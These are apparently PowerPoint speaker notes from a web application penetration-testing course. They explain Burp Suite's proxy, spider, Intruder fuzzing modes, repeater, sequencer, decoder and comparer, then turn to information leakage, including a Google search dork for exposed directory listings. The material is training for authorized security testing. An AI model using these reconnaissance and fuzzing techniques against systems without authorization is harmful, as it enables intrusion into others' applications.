              <a:t>We also have an area where we can create rules for changes needed for this specific application.  We commonly use this to prevent ourselves from leaving the target application.  It is quite common for us to be testing an application such as http://dev.secureideas.net but the application links to www.secureideas.net.  By having Burp change all of the www to dev, we won't accidentally move to the production site.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15534458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Burp also has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a web interface that is accessible to any browser using Burp as a proxy.  If the tester enters http://burp, Burp displays a list of all the requests it has seen.  This allows us to browse through them quite quickly and the select ones that are interesting to us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>When we select one, we are shown the entire request.  We can then either choose to examine the response or repeat the request in the browser.  This allows us to test out things such as replay attacks or CSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39650130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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239619" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The burp spider is the part of the suite that will spider a web site and retrieve the various pages that make it up.  There are two ways to feed the spider the beginning URL.  The first is to right click on a URL in the target tab and select send to spider.  The second is that if we just click "Spider running", it will spider from the last request seen by the proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp spider can handle some of the more complex web application such as AJAX applications and sites that use other JavaScript to build the URLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>With forms that require an answer, burp spider will either prompt the user to answer the form or we can configure it with some predetermined answers.</a:t>
            </a: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48</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240643" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Burp Intruder is the automated attack tool within the suite.  The Intruder is limited with in the free version of Burp, but still contains numerous attacks within it.  When we send requests to the intruder, it attempts to automatically determine which parameters should be targeted.  We are able to use the buttons on the right hand side of the screen to move this selection.</a:t>
            </a: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49</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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We have tried to organize today around methods and order we follow in a real test.  Normally we will run automated tools to find the low hanging fruit and walk rapidly through the application.  We then manually walk through the web application to verify the findings from the automated tools and to find other flaws.  Finally we will often create custom scripts to automate some of our findings.</a:t>
            </a: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5</a:t>
            </a:fld>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Intruder has four fuzzing types that allow us to decide how it will attack the request.  These are based on how payloads are used within the request.  These types are as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each position is fuzzed, one at a time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most fuzzing attacks work here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Battering Ram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One set of payloads is injected into all positions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful is more than one parameter needs to be set the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pitchfork</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each position is fuzzed simultaneously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful if related injections are needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cluster Bomb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="3" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Iterates through each position's payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="3" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to sniper except for multiple positions at once</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20398223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use Intruder, the payloads are what are actually used to test the requests.  We decide what type of attack we are looking to be able to perform and then choose payloads based on that.  For example, we would use a dictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to perform a brute force attack but would use various attack strings to find SQL injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> As we set up our fuzzing session, we would pick the various payloads from the drop down.  We have the option to use various items such as UNICODE characters, various characters and preset lists.  We can also choose to load our attacks from a prepared file.  For this, FuzzDB is an excellent source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As we set up the attack we also have the ability to set up processing rules.  These allow for actions such as URL or BASE64 encoding the payload before making the request.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41949486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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241667" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The burp repeater is used for us to examine and mangle requests that have been made.  We are able to examine both the request and the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can use the repeater to verify any findings that have been gathered during our testing and to manually check for other flaws.</a:t>
            </a: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52</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242691" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The burp sequencer is used to determine the predictability of the session token used by the application.  Burp attempts to detect the session token automatically, but sometimes we need to select the token in the selected response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp sequencer actually attempts to detect predictable session tokens using a number of different tests.  This gives us a much better chance of detecting predictable sessions than just graphing the results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It will perform a number of FIPS 140-2 tests, which use techniques used in cryptanalysis to determine the entropy within the tokens.  It will also perform compression on the tokens since predictable tokens compress smaller than unpredictable tokens.  Burp sequencer also performs correlation tests to find patterns similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>WebScarab's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> graphing.</a:t>
            </a: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53</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243715" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Burp decoder is used to encode and decode data used by the application.  It is very common for us to see information that is base64 or URL encoded being used.  Using the decoder we can decode it, determine what the information is and then encode any changes we want to make to the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We also see data that has been md5 or sha1 hashed.  While the decoder cannot reverse these, we can try to guess what the data is and hash it to compare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are two ways to get data of interest to the decoder.  The first is to simply type it into the fields on the decoder tab of Burp.  The second is the select the data of interest in another tab, right click on it and select "send to decoder".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then select what encoding/hashing we would like to perform and it displays the results in the bottom field.</a:t>
            </a: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54</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244739" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Burp comparer is the final part of the suite to discuss.  It is used to show us the differences between two requests or responses.  This is a great way to determine if our mangled requests have caused a different response from the application.  We can also find harvesting type issues this way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The comparer uses two different methods to see differences.  It compares at the byte level and the word level.  Byte level comparison is as simple as it sounds.  The word level comparison uses whitespace to delineate words.</a:t>
            </a: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55</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245763" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this next exercise we will explore the burp suite.</a:t>
            </a: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56</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252931" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information leakage is one of the basic flaws.  But it reveals information that makes all of the other attacks easier and more successful.  As testers, we need to realize that information is power.  The more information we have regarding our target, the easier our attacks become.  As we discussed on day 2, we should have a lot of information available already.  This next section will discuss adding to it via various flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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57</a:t>
            </a:fld>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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253955"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"Information leakage" is a simple form of attack, in which you search for information which is not supposed to be available to you.  This can be in the form of files, "hidden" directories, Microsoft Office files with change-tracking, and more.  We have already explored information leakage during the recon step of the test.  Mapping also will find other information leakage.  Here we will be exploring info leakage that takes a little more effort to find.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:sym typeface="Wingdings" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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58</a:t>
            </a:fld>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Information can come in many forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This information can lead to other vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rarely direct exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="614902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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will now examine creating custom scripts for testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRP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6</a:t>
            </a:fld>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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>By default, most web servers provide directory listings with point-and-click access to files and directories for easy interaction.  This functionality has generally been discouraged and is seldom left enabled on production servers, but is one of the things often overlooked until security testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information that should not be seen by the public should be removed from web directories.  You will often be amazed at what has been left available, even in hidden directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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60</a:t>
            </a:fld>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256003" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Google is amazing for finding pages with this functionality enabled.  While most people use Google as we did yesterday, it is even more useful finding vulnerabilities such as this one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Search for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>intitle:"Index of" "Last Modified"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Narrow the search more with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Site:targetdomain.tld</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The intitle: tells Google to only show pages that include "Index of" in the title.  And the "Last Modified" must be within the body of the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This would have been found during recon, but we discuss it here for relevance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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61</a:t>
            </a:fld>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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
